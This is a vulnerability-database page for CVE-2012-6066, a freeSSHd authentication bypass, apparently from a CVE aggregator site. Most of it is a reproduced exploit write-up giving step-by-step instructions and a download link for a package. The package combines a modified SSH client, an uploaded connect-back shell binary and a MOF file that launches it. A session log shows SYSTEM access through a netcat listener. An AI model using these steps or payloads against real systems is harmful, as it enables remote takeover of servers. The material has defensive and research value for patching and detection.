CVE-2012-6066
Description
freeSSHd.exe in freeSSHd through 1.2.6 allows remote attackers to bypass authentication via a crafted session, as demonstrated by an OpenSSH client with modified versions of ssh.c and sshconnect2.c.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
freeFTPd 1.2.6 - Remote Authentication Bypass
FreeFTPD all versions Remote System Level Exploit Zero-Day -- No username needed, straightforward rooting!
Discovered & Exploited By Kingcope
Year 2011
--
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23079.zip
Example banner: WeOnlyDo-wodFTPD 2.3.6.165
This package includes all you need to successfully root any version of FreeFTPD:
* Modified version of ssh.exe (FreeFTPD authentication bypass)
* sftp.exe for connecting to the server
* nullevent.exe connect back shell that is uploaded to the server
* nullevent.mof file which is uploaded to the server to execute the connect back shell
* MSVCR100.dll that is needed by nullevent.exe
* scan logs for your pleasure!
We make use of the STUXNET technique to execute code, So let's go:
1.) Setup a netcat on a host you have, firewall open on the listening port
2.) modify nullevent.mof in an editor (where the ip and port is) according to your netcat config
3.) connect to the FreeSSHD: sftp.exe -S ./ssh.exe <ip/host>
4.) upload (put) nullevent.exe: put nullevent.exe
5.) upload (put) MSVCR100.dll: put MSVCR100.dll
6.) upload (put) nullevent.mof to wbem/mof/nullevent.mof: put nullevent.mof wbem/mof/nullevent.mof
7.) Enjoy your system shell which will blink up on you netcat after 1 minute!!
8.) Cleanup by deleting nullevent.exe located in c:\windows\system32\
8.) Enjoy!
9.) Enjoy!
10.) Enjoy!
Example exploitation session:
C:\Users\KC\Desktop\FreeFTPD_0day>sftp -S ./ssh.exe 83.241.214.171
Could not create directory '/home/KC/.ssh'.
The authenticity of host '83.241.214.171 (83.241.214.171)' can't be established.
RSA key fingerprint is a8:ba:6d:0a:c6:ae:8b:a1:b6:47:7b:43:a8:de:4b:8e.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/KC/.ssh/known_hosts).
Connected to 83.241.214.171.
sftp> put nullevent.exe
Uploading nullevent.exe to /nullevent.exe
nullevent.exe 100% 7168 7.0KB/s 00:00
sftp> put MSVCR100.dll
Uploading MSVCR100.dll to /MSVCR100.dll
MSVCR100.dll 100% 751KB 22.8KB/s 00:33
sftp> put nullevent.mof wbem/mof/nullevent.mof
Uploading nullevent.mof to /wbem/mof/nullevent.mof
nullevent.mof 100% 691 0.7KB/s 00:00
sftp>
[root@vs2067037 ~]# nc -v -l 443
Connection from 83.231.224.193 port 443 [tcp/https] accepted
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>whoami
whoami
nt authority\systemfreeSSHd 1.2.6 - Authentication Bypass (Metasploit)
freeSSHd 2.1.3 - Remote Authentication Bypass
Metasploit modules
References
CWEs
CWE-287
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.